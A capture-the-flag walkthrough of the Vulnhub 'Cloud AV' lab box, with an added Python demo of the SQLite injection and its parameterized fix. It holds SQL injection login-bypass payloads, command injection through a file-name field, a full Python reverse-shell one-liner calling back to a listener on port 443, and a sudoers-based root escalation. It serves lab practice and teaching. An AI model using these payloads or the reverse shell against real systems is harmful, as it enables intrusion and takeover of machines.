Vulnhub BoredHackerBlog: Cloud AV Walkthrough

    The description states:  "Cloud Anti-Virus Scanner! is a cloud-based antivirus scanning service.  Currently, it's in beta mode. You've been asked to test the setup and find vulnerabilities and escalate privs."

    This box is labeled easy and I think that's fair, although a couple of sections may hang some people up.

    First, we kick off with Nmap:



    Not a whole lot of options so we'll explore port 8080:


    Meanwhile, Nikto is running:


    We find an additional page:


    Circling back to the first page, let's see if we can get some sort of injection:


    When we select the Log in button, we get:


    I'm not sure I've encountered SQLite before, but the syntax is nearly the same.  Instead of the usual:  1' or '1'='1

    We go with:


    If you're not familiar with SQL injection: the leading quote closes the string the application expected, so the WHERE clause now reads "the invite code is (NOTHING) or 1=1".  Since 1 does equal 1, every row matches, a true statement, and we bypass the check.  And we do...
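    As an added example (not code from the original post or from the Cloud AV app), here is the bypass reproduced against an in-memory SQLite database, with the safe parameterized query beside it.  The table name, column name and the exact query the app builds are assumptions; the page only shows that the backend is SQLite and that a quote-then-OR payload gets through.

```python
import sqlite3

# Constructed stand-in for the app's invite-code table. The real schema and
# query are not on the page; the names below are assumptions for the demo.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE code (id INTEGER PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO code (password) VALUES ('secret-invite')")
    conn.commit()
    return conn


def build_query_vulnerable(submitted):
    # The submitted text is pasted straight into the SQL string, so a quote
    # in the input terminates the literal and the rest is parsed as SQL.
    return "SELECT * FROM code WHERE password = '%s'" % submitted


def check_invite_vulnerable(conn, submitted):
    """True if at least one row matches: the login gate, as assumed here."""
    return conn.execute(build_query_vulnerable(submitted)).fetchone() is not None


def check_invite_safe(conn, submitted):
    """Same check with a bound parameter: the input is always data, never SQL."""
    row = conn.execute("SELECT * FROM code WHERE password = ?", (submitted,)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = build_db()
    # Two payload shapes. The first needs the trailing comment ('--' is a
    # line comment in SQLite) to swallow the app's own closing quote; the
    # second supplies a string that pairs with that closing quote itself.
    for payload in ["' or 1=1--", "' or '1'='1"]:
        print(build_query_vulnerable(payload))
        print("  vulnerable:", check_invite_vulnerable(db, payload),
              " safe:", check_invite_safe(db, payload))
```

    Running it prints the rewritten queries and shows the vulnerable check returning True for both payloads while the parameterized check returns False, because the bound value `' or 1=1--` is compared literally against the stored code.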


    Assuming we're supposed to choose one of the above files, I choose hello and select Scan!:


    Wondering if we can abuse this...


    Turns out, we can:


    Now I'm wondering if we can get out, that is, whether the box can reach back to our machine:


    With our handler setup:


    Excellent!  We can reach out.  Let's go for a reverse shell, appended to the file name the same way:


    What you can't see in the screenshot is the full payload:

    ; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.86.99",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

    With our handler listening on 443:


    We catch our shell!  Looking around:


    We have a compiled binary and what I assume is its source code.

    Let's take a look:


    Looks like we can abuse it:


    We get execution of a command as root.  Excellent!  Let's add our user to sudoers with full permissions and no password required:


    We sudo su and we're root! 

    Nice box! 


    © 2020 sevenlayers.com